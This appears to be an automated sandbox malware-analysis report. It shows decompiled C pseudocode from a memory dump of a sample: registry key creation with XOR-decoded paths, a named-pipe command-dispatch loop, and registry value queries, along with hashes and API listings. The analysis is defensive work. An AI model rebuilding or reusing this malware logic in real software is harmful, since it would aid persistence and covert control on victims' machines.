                                                                                                                                                                                                • Opcode Fuzzy Hash: ab5dc4543ee3d12507d712e6472f86243a0bd927834b6c76241f75fa856933fb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1CE1DD31604305AFE314EBA4DD86BBB73E9AB98310F440A29F294DB2D1DF75E944CB52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                			E00AF9B24(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                				int _v12;
                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                				int _v24;
                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                				char _v36;
                                                                                                                                                                                                				int* _v40;
                                                                                                                                                                                                				int** _v44;
                                                                                                                                                                                                				void _v108;
                                                                                                                                                                                                				int* _t90;
                                                                                                                                                                                                				void* _t91;
                                                                                                                                                                                                				char* _t92;
                                                                                                                                                                                                				long _t96;
                                                                                                                                                                                                				int* _t97;
                                                                                                                                                                                                				int* _t101;
                                                                                                                                                                                                				long _t111;
                                                                                                                                                                                                				int* _t112;
                                                                                                                                                                                                				intOrPtr _t122;
                                                                                                                                                                                                				char* _t125;
                                                                                                                                                                                                				intOrPtr _t126;
                                                                                                                                                                                                				intOrPtr _t128;
                                                                                                                                                                                                				int* _t129;
                                                                                                                                                                                                				intOrPtr _t131;
                                                                                                                                                                                                				int* _t133;
                                                                                                                                                                                                				intOrPtr _t134;
                                                                                                                                                                                                				int* _t135;
                                                                                                                                                                                                				intOrPtr _t136;
                                                                                                                                                                                                				char* _t139;
                                                                                                                                                                                                				int _t143;
                                                                                                                                                                                                				int _t147;
                                                                                                                                                                                                				intOrPtr _t148;
                                                                                                                                                                                                				int* _t149;
                                                                                                                                                                                                				int* _t154;
                                                                                                                                                                                                				int** _t155;
                                                                                                                                                                                                				int* _t161;
                                                                                                                                                                                                				int* _t163;
                                                                                                                                                                                                				intOrPtr _t164;
                                                                                                                                                                                                				intOrPtr _t171;
                                                                                                                                                                                                				int _t176;
                                                                                                                                                                                                				char* _t177;
                                                                                                                                                                                                				char* _t178;
                                                                                                                                                                                                				char _t179;
                                                                                                                                                                                                				void* _t180;
                                                                                                                                                                                                				void* _t181;
                                                                                                                                                                                                				void* _t183;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t176 = 0;
                                                                                                                                                                                                				_v24 = __edx;
                                                                                                                                                                                                				_t177 = 0;
                                                                                                                                                                                                				_v32 = __ecx;
                                                                                                                                                                                                				_v28 = 0;
                                                                                                                                                                                                				_v8 = 0x80000001;
                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                				_t155 = E00AF85E5(0x110);
                                                                                                                                                                                                				_v44 = _t155;
                                                                                                                                                                                                				if(_t155 != 0) {
                                                                                                                                                                                                					_t158 = _a4;
                                                                                                                                                                                                					_t155[0x42] = _a4;
                                                                                                                                                                                                					E00AFB638(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
                                                                                                                                                                                                					_t161 = _v108;
                                                                                                                                                                                                					__eflags = _t161 - 0x61 - 0x19;
                                                                                                                                                                                                					_t90 = _t161;
                                                                                                                                                                                                					if(_t161 - 0x61 <= 0x19) {
                                                                                                                                                                                                						_t90 = _t90 - 0x20;
                                                                                                                                                                                                						__eflags = _t90;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_v108 = _t90;
                                                                                                                                                                                                					_t91 = E00AF95A8(0x4d2);
                                                                                                                                                                                                					_t163 = _v24;
                                                                                                                                                                                                					_v16 = _t91;
                                                                                                                                                                                                					__eflags = _t163;
                                                                                                                                                                                                					if(_t163 == 0) {
                                                                                                                                                                                                						L16:
                                                                                                                                                                                                						_t164 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
                                                                                                                                                                                                						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
                                                                                                                                                                                                							_push(_t176);
                                                                                                                                                                                                							_push( &_v108);
                                                                                                                                                                                                							_push("\\");
                                                                                                                                                                                                							_t92 = E00AF9273(_t91);
                                                                                                                                                                                                							_t181 = _t181 + 0x10;
                                                                                                                                                                                                							L20:
                                                                                                                                                                                                							_t177 = _t92;
                                                                                                                                                                                                							_v20 = _t177;
                                                                                                                                                                                                							goto L21;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_v24 = _t176;
                                                                                                                                                                                                						_v8 = 0x80000003;
                                                                                                                                                                                                						_t122 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
                                                                                                                                                                                                						__eflags = _v24 - _t177;
                                                                                                                                                                                                						if(_v24 == _t177) {
                                                                                                                                                                                                							goto L21;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_push(_t176);
                                                                                                                                                                                                						_push( &_v108);
                                                                                                                                                                                                						_t125 = "\\";
                                                                                                                                                                                                						_push(_t125);
                                                                                                                                                                                                						_push(_v16);
                                                                                                                                                                                                						_push(_t125);
                                                                                                                                                                                                						_t92 = E00AF9273(_v24);
                                                                                                                                                                                                						_t181 = _t181 + 0x18;
                                                                                                                                                                                                						goto L20;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_t126 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                						_t128 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
                                                                                                                                                                                                						__eflags = _t129;
                                                                                                                                                                                                						if(_t129 != 0) {
                                                                                                                                                                                                							_t91 = _v16;
                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_v12 = _t176;
                                                                                                                                                                                                						_t131 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                						_v8 = 0x80000003;
                                                                                                                                                                                                						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
                                                                                                                                                                                                						__eflags = _v12 - _t177;
                                                                                                                                                                                                						if(_v12 == _t177) {
                                                                                                                                                                                                							L21:
                                                                                                                                                                                                							E00AF85A3( &_v16);
                                                                                                                                                                                                							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
                                                                                                                                                                                                							__eflags = _t96;
                                                                                                                                                                                                							if(_t96 == 0) {
                                                                                                                                                                                                								_t97 = _a8;
                                                                                                                                                                                                								__eflags = _t97;
                                                                                                                                                                                                								if(_t97 != 0) {
                                                                                                                                                                                                									 *_t97 = 1;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_push(_v28);
                                                                                                                                                                                                								L30:
                                                                                                                                                                                                								RegCloseKey();
                                                                                                                                                                                                								_t155[0x43] = _v8;
                                                                                                                                                                                                								_t101 = E00AFC3BB(_t177);
                                                                                                                                                                                                								 *_t155 = _t101;
                                                                                                                                                                                                								__eflags = _t101;
                                                                                                                                                                                                								if(_t101 == 0) {
                                                                                                                                                                                                									L32:
                                                                                                                                                                                                									E00AF85FB( &_v20, 0xffffffff);
                                                                                                                                                                                                									return _t155;
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									goto L31;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								do {
                                                                                                                                                                                                									L31:
                                                                                                                                                                                                									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
                                                                                                                                                                                                									_t176 = _t176 + 1;
                                                                                                                                                                                                									__eflags = _t176 -  *_t155;
                                                                                                                                                                                                								} while (_t176 <  *_t155);
                                                                                                                                                                                                								goto L32;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_v16 = _t176;
                                                                                                                                                                                                							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
                                                                                                                                                                                                							__eflags = _t111;
                                                                                                                                                                                                							if(_t111 == 0) {
                                                                                                                                                                                                								_t112 = _a8;
                                                                                                                                                                                                								__eflags = _t112;
                                                                                                                                                                                                								if(_t112 != 0) {
                                                                                                                                                                                                									 *_t112 = _t176;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_push(_v16);
                                                                                                                                                                                                								goto L30;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							L23:
                                                                                                                                                                                                							E00AF85FB( &_v44, 0x110);
                                                                                                                                                                                                							memset( &_v108, _t176, 0x40);
                                                                                                                                                                                                							E00AF85FB( &_v20, 0xffffffff);
                                                                                                                                                                                                							goto L1;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_push(_t176);
                                                                                                                                                                                                						_push(_v16);
                                                                                                                                                                                                						_t178 = "\\";
                                                                                                                                                                                                						_push(_t178);
                                                                                                                                                                                                						_t133 = E00AF9273(_v12);
                                                                                                                                                                                                						_t181 = _t181 + 0x10;
                                                                                                                                                                                                						_v40 = _t133;
                                                                                                                                                                                                						__eflags = _t133;
                                                                                                                                                                                                						if(_t133 == 0) {
                                                                                                                                                                                                							goto L23;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t134 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
                                                                                                                                                                                                						__eflags = _t135;
                                                                                                                                                                                                						if(_t135 == 0) {
                                                                                                                                                                                                							_t136 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							_t143 = E00AF95C2( &_v36, 0x34);
                                                                                                                                                                                                							_v24 = _t143;
                                                                                                                                                                                                							_t179 = E00AF92C6(_v32);
                                                                                                                                                                                                							_v32 = _t179;
                                                                                                                                                                                                							E00AF85B6( &_v24);
                                                                                                                                                                                                							_t183 = _t181 + 0x18;
                                                                                                                                                                                                							_t147 = E00AF9237(_v12);
                                                                                                                                                                                                							_v24 = _t147;
                                                                                                                                                                                                							_t148 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
                                                                                                                                                                                                							__eflags = _t149;
                                                                                                                                                                                                							if(_t149 == 0) {
                                                                                                                                                                                                								_t154 = _a12;
                                                                                                                                                                                                								__eflags = _t154;
                                                                                                                                                                                                								if(_t154 != 0) {
                                                                                                                                                                                                									 *_t154 = 1;
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                							E00AF85FB( &_v32, 0xfffffffe);
                                                                                                                                                                                                							E00AF85FB( &_v24, 0xfffffffe);
                                                                                                                                                                                                							_t181 = _t183 + 0x10;
                                                                                                                                                                                                							_t178 = "\\";
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t139 = E00AF9273(_v12);
                                                                                                                                                                                                						_t171 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                						_t181 = _t181 + 0x18;
                                                                                                                                                                                                						_t177 = _t139;
                                                                                                                                                                                                						_v20 = _t177;
                                                                                                                                                                                                						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
                                                                                                                                                                                                						E00AF85FB( &_v40, 0xffffffff);
                                                                                                                                                                                                						goto L21;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				L1:
                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                			}


















































                                                                                                                                                                                                0x00af9cf9
                                                                                                                                                                                                0x00af9cfc
                                                                                                                                                                                                0x00af9cff
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9d01
                                                                                                                                                                                                0x00af9d05
                                                                                                                                                                                                0x00af9d06
                                                                                                                                                                                                0x00af9d0b
                                                                                                                                                                                                0x00af9d0c
                                                                                                                                                                                                0x00af9d0f
                                                                                                                                                                                                0x00af9d13
                                                                                                                                                                                                0x00af9d18
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9b9f
                                                                                                                                                                                                0x00af9b9f
                                                                                                                                                                                                0x00af9bac
                                                                                                                                                                                                0x00af9bb2
                                                                                                                                                                                                0x00af9bb5
                                                                                                                                                                                                0x00af9bb7
                                                                                                                                                                                                0x00af9ccc
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9ccc
                                                                                                                                                                                                0x00af9bc0
                                                                                                                                                                                                0x00af9bc4
                                                                                                                                                                                                0x00af9bcc
                                                                                                                                                                                                0x00af9bd3
                                                                                                                                                                                                0x00af9bd6
                                                                                                                                                                                                0x00af9bd9
                                                                                                                                                                                                0x00af9d35
                                                                                                                                                                                                0x00af9d38
                                                                                                                                                                                                0x00af9d50
                                                                                                                                                                                                0x00af9d53
                                                                                                                                                                                                0x00af9d55
                                                                                                                                                                                                0x00af9da9
                                                                                                                                                                                                0x00af9dac
                                                                                                                                                                                                0x00af9dae
                                                                                                                                                                                                0x00af9db0
                                                                                                                                                                                                0x00af9db0
                                                                                                                                                                                                0x00af9db6
                                                                                                                                                                                                0x00af9db9
                                                                                                                                                                                                0x00af9dbe
                                                                                                                                                                                                0x00af9dc5
                                                                                                                                                                                                0x00af9dcb
                                                                                                                                                                                                0x00af9dd0
                                                                                                                                                                                                0x00af9dd3
                                                                                                                                                                                                0x00af9dd5
                                                                                                                                                                                                0x00af9dec
                                                                                                                                                                                                0x00af9df2
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9dd7
                                                                                                                                                                                                0x00af9dd7
                                                                                                                                                                                                0x00af9de3
                                                                                                                                                                                                0x00af9de7
                                                                                                                                                                                                0x00af9de8
                                                                                                                                                                                                0x00af9de8
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9dd7
                                                                                                                                                                                                0x00af9d5a
                                                                                                                                                                                                0x00af9d67
                                                                                                                                                                                                0x00af9d6a
                                                                                                                                                                                                0x00af9d6c
                                                                                                                                                                                                0x00af9d9b
                                                                                                                                                                                                0x00af9d9e
                                                                                                                                                                                                0x00af9da0
                                                                                                                                                                                                0x00af9da2
                                                                                                                                                                                                0x00af9da2
                                                                                                                                                                                                0x00af9da4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9da4
                                                                                                                                                                                                0x00af9d6e
                                                                                                                                                                                                0x00af9d77
                                                                                                                                                                                                0x00af9d83
                                                                                                                                                                                                0x00af9d8e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9d93
                                                                                                                                                                                                0x00af9bdf
                                                                                                                                                                                                0x00af9be0
                                                                                                                                                                                                0x00af9be3
                                                                                                                                                                                                0x00af9be8
                                                                                                                                                                                                0x00af9bec
                                                                                                                                                                                                0x00af9bf1
                                                                                                                                                                                                0x00af9bf4
                                                                                                                                                                                                0x00af9bf7
                                                                                                                                                                                                0x00af9bf9
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9c0a
                                                                                                                                                                                                0x00af9c12
                                                                                                                                                                                                0x00af9c15
                                                                                                                                                                                                0x00af9c17
                                                                                                                                                                                                0x00af9c8c
                                                                                                                                                                                                0x00af9c94
                                                                                                                                                                                                0x00af9c19
                                                                                                                                                                                                0x00af9c1b
                                                                                                                                                                                                0x00af9c2a
                                                                                                                                                                                                0x00af9c32
                                                                                                                                                                                                0x00af9c38
                                                                                                                                                                                                0x00af9c3b
                                                                                                                                                                                                0x00af9c43
                                                                                                                                                                                                0x00af9c46
                                                                                                                                                                                                0x00af9c50
                                                                                                                                                                                                0x00af9c53
                                                                                                                                                                                                0x00af9c58
                                                                                                                                                                                                0x00af9c5b
                                                                                                                                                                                                0x00af9c5d
                                                                                                                                                                                                0x00af9c5f
                                                                                                                                                                                                0x00af9c62
                                                                                                                                                                                                0x00af9c64
                                                                                                                                                                                                0x00af9c66
                                                                                                                                                                                                0x00af9c66
                                                                                                                                                                                                0x00af9c64
                                                                                                                                                                                                0x00af9c72
                                                                                                                                                                                                0x00af9c7d
                                                                                                                                                                                                0x00af9c82
                                                                                                                                                                                                0x00af9c85
                                                                                                                                                                                                0x00af9c85
                                                                                                                                                                                                0x00af9ca4
                                                                                                                                                                                                0x00af9ca9
                                                                                                                                                                                                0x00af9caf
                                                                                                                                                                                                0x00af9cb2
                                                                                                                                                                                                0x00af9cb4
                                                                                                                                                                                                0x00af9cba
                                                                                                                                                                                                0x00af9cc3
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9cc9
                                                                                                                                                                                                0x00af9b99
                                                                                                                                                                                                0x00af9b58
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                • Opcode ID: 9b8d92084b59a864b9a7ab8c402ac3481a9f90b454bb744a8fe7205a86e4b59e
                                                                                                                                                                                                • Instruction ID: d8b2d8d0df7e8efe33c1c8642fe3aa3cea4d9672a8835ec0c8e449e12c3dedd6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b8d92084b59a864b9a7ab8c402ac3481a9f90b454bb744a8fe7205a86e4b59e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F9105B190020DAFDF10DFE9DD45EEEBBB8EB58310F2005A9F614A7261DB319A01CB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 54%
                                                                                                                                                                                                			E00AF3294() {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				struct _OVERLAPPED* _v12;
                                                                                                                                                                                                				struct _OVERLAPPED* _v16;
                                                                                                                                                                                                				intOrPtr* _v20;
                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                                                				signed int _v36;
                                                                                                                                                                                                				intOrPtr* _v40;
                                                                                                                                                                                                				char _v168;
                                                                                                                                                                                                				char _v172;
                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                				void* _t47;
                                                                                                                                                                                                				char _t54;
                                                                                                                                                                                                				char _t61;
                                                                                                                                                                                                				intOrPtr _t64;
                                                                                                                                                                                                				void* _t65;
                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                				void* _t70;
                                                                                                                                                                                                				void* _t72;
                                                                                                                                                                                                				void* _t76;
                                                                                                                                                                                                				struct _OVERLAPPED* _t82;
                                                                                                                                                                                                				intOrPtr* _t83;
                                                                                                                                                                                                				signed int _t84;
                                                                                                                                                                                                				signed short* _t86;
                                                                                                                                                                                                				intOrPtr* _t97;
                                                                                                                                                                                                				signed short* _t105;
                                                                                                                                                                                                				void* _t107;
                                                                                                                                                                                                				void* _t108;
                                                                                                                                                                                                				void* _t109;
                                                                                                                                                                                                				intOrPtr* _t112;
                                                                                                                                                                                                				struct _OVERLAPPED* _t113;
                                                                                                                                                                                                				char _t114;
                                                                                                                                                                                                				void* _t115;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t113 = 0;
                                                                                                                                                                                                				_t82 = 0;
                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                					_v16 = _t113;
                                                                                                                                                                                                					if(ConnectNamedPipe( *0xb0e674, _t113) == 0 && GetLastError() != 0x217) {
                                                                                                                                                                                                						break;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_push(_t113);
                                                                                                                                                                                                					_push( &_v16);
                                                                                                                                                                                                					_t41 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                					_push(0x80000);
                                                                                                                                                                                                					_push( *0xb0e724);
                                                                                                                                                                                                					_push( *0xb0e674);
                                                                                                                                                                                                					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
                                                                                                                                                                                                						GetLastError();
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_t86 =  *0xb0e724; // 0x5090020
                                                                                                                                                                                                						_t47 = ( *_t86 & 0x0000ffff) - 1;
                                                                                                                                                                                                						if(_t47 == 0) {
                                                                                                                                                                                                							_t112 = E00AF939F( &(_t86[4]), 0x20, 1,  &_v24);
                                                                                                                                                                                                							_v40 = _t112;
                                                                                                                                                                                                							if(_t112 != 0) {
                                                                                                                                                                                                								_t114 = _v24;
                                                                                                                                                                                                								if(_t114 <= 1) {
                                                                                                                                                                                                									_t113 = 0;
                                                                                                                                                                                                									_t54 = E00AF1D89(E00AF972A( *_t112), 0, 0, 0);
                                                                                                                                                                                                									_t115 = _t115 + 0x10;
                                                                                                                                                                                                									_v172 = _t54;
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									_v36 = _t114 - 1;
                                                                                                                                                                                                									_t83 = E00AF85E5(_t114 - 1 << 2);
                                                                                                                                                                                                									_v32 = _t83;
                                                                                                                                                                                                									if(_t83 == 0) {
                                                                                                                                                                                                										_t113 = 0;
                                                                                                                                                                                                									} else {
                                                                                                                                                                                                										if(_t114 > 1) {
                                                                                                                                                                                                											_v20 = _t83;
                                                                                                                                                                                                											_t84 = 1;
                                                                                                                                                                                                											do {
                                                                                                                                                                                                												_t64 = E00AF9187( *((intOrPtr*)(_t112 + _t84 * 4)), E00AFC3BB( *((intOrPtr*)(_t112 + _t84 * 4))));
                                                                                                                                                                                                												_t97 = _v20;
                                                                                                                                                                                                												_t84 = _t84 + 1;
                                                                                                                                                                                                												 *_t97 = _t64;
                                                                                                                                                                                                												_v20 = _t97 + 4;
                                                                                                                                                                                                											} while (_t84 < _t114);
                                                                                                                                                                                                											_t83 = _v32;
                                                                                                                                                                                                										}
                                                                                                                                                                                                										_t113 = 0;
                                                                                                                                                                                                										_t61 = E00AF1D89(E00AF972A( *_t112), _t83, _v36, 0);
                                                                                                                                                                                                										_t115 = _t115 + 0x10;
                                                                                                                                                                                                										_v172 = _t61;
                                                                                                                                                                                                										E00AF9498( &_v24);
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_t82 = _v12;
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_t105 =  *0xb0e724; // 0x5090020
                                                                                                                                                                                                							E00AF96AB( &_v168,  &(_t105[4]), 0x80);
                                                                                                                                                                                                							_push(0x84);
                                                                                                                                                                                                							_push( &_v172);
                                                                                                                                                                                                							_push(2);
                                                                                                                                                                                                							goto L33;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							_t65 = _t47 - 3;
                                                                                                                                                                                                							if(_t65 == 0) {
                                                                                                                                                                                                								_push(_t113);
                                                                                                                                                                                                								_push(_t113);
                                                                                                                                                                                                								_t108 = 5;
                                                                                                                                                                                                								E00AFC35B(_t108);
                                                                                                                                                                                                								 *0xb0e758 = 1;
                                                                                                                                                                                                								_t82 = 1;
                                                                                                                                                                                                								_v12 = 1;
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								_t68 = _t65;
                                                                                                                                                                                                								if(_t68 == 0) {
                                                                                                                                                                                                									_t70 = E00AFF7E1( &_v8);
                                                                                                                                                                                                									goto L13;
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									_t72 = _t68 - 1;
                                                                                                                                                                                                									if(_t72 == 0) {
                                                                                                                                                                                                										E00AFF7E1( &_v8);
                                                                                                                                                                                                										goto L16;
                                                                                                                                                                                                									} else {
                                                                                                                                                                                                										_t76 = _t72 - 1;
                                                                                                                                                                                                										if(_t76 == 0) {
                                                                                                                                                                                                											_t70 = E00AFF803( &_v8);
                                                                                                                                                                                                											L13:
                                                                                                                                                                                                											if(_t70 == 0) {
                                                                                                                                                                                                												_push(_t113);
                                                                                                                                                                                                												_push(_t113);
                                                                                                                                                                                                												_push(0xa);
                                                                                                                                                                                                											} else {
                                                                                                                                                                                                												_push(_v8);
                                                                                                                                                                                                												_push(_t70);
                                                                                                                                                                                                												_push(5);
                                                                                                                                                                                                											}
                                                                                                                                                                                                											_pop(_t109);
                                                                                                                                                                                                											E00AFC35B(_t109);
                                                                                                                                                                                                										} else {
                                                                                                                                                                                                											if(_t76 == 1) {
                                                                                                                                                                                                												E00AFF803( &_v8);
                                                                                                                                                                                                												L16:
                                                                                                                                                                                                												_push(4);
                                                                                                                                                                                                												_push( &_v8);
                                                                                                                                                                                                												_push(5);
                                                                                                                                                                                                												L33:
                                                                                                                                                                                                												_pop(_t107);
                                                                                                                                                                                                												E00AFC35B(_t107);
                                                                                                                                                                                                												_t115 = _t115 + 0xc;
                                                                                                                                                                                                											}
                                                                                                                                                                                                										}
                                                                                                                                                                                                									}
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                					DisconnectNamedPipe( *0xb0e674);
                                                                                                                                                                                                					if(_t82 == 0) {
                                                                                                                                                                                                						continue;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					break;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                			}





































                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ConnectNamedPipe.KERNELBASE(00000000), ref: 00AF32B9
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00AF32C3
                                                                                                                                                                                                  • Part of subcall function 00AFC35B: FlushFileBuffers.KERNEL32(000003B4,?,?,?,00AF3496,?,00000084,00000080), ref: 00AFC3A1
                                                                                                                                                                                                • DisconnectNamedPipe.KERNEL32 ref: 00AF34A7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2389948835-0
                                                                                                                                                                                                • Opcode ID: 8c8287f565d1ed00f3473db2f8b29b0fbd5a9cb33768433194beda6c55970b81
                                                                                                                                                                                                • Instruction ID: 8c7defb4bc4d5fc814c84eb9b703abe397058a33f07b6e7cfe6f0e8afdbb0731
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c8287f565d1ed00f3473db2f8b29b0fbd5a9cb33768433194beda6c55970b81
                                                                                                                                                                                                • Instruction Fuzzy Hash: D851EF72A0021DAECF11EFE5DE89ABEBBB8EB14311F10452AF715A7140DB719B44CB91
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AFBF79(short* __edx, short* _a4) {
                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                				int _v12;
                                                                                                                                                                                                				int _v16;
                                                                                                                                                                                                				char* _v20;
                                                                                                                                                                                                				char* _t30;
                                                                                                                                                                                                				intOrPtr _t31;
                                                                                                                                                                                                				char* _t49;
                                                                                                                                                                                                
                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
                                                                                                                                                                                                					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
                                                                                                                                                                                                						L6:
                                                                                                                                                                                                						if(_v8 != 0) {
                                                                                                                                                                                                							_t31 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t30 = 0;
                                                                                                                                                                                                						L9:
                                                                                                                                                                                                						return _t30;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t49 = E00AF85E5(_v12);
                                                                                                                                                                                                					_v20 = _t49;
                                                                                                                                                                                                					if(_t49 == 0) {
                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
                                                                                                                                                                                                						RegCloseKey(_v8);
                                                                                                                                                                                                						_t30 = _t49;
                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					E00AF85FB( &_v20, 0xfffffffe);
                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                			}











                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020019,00000000,00000000,?,?,00AF2BFB,00000000), ref: 00AFBFA0
                                                                                                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00AF2BFB,00000000,?,00000000,00AF2BFB,00000000,?,?,00AF2BFB,00000000), ref: 00AFBFC4
                                                                                                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00AF2BFB,00000000,00000000,00000000,00AF2BFB,?,?,00AF2BFB,00000000), ref: 00AFBFF2
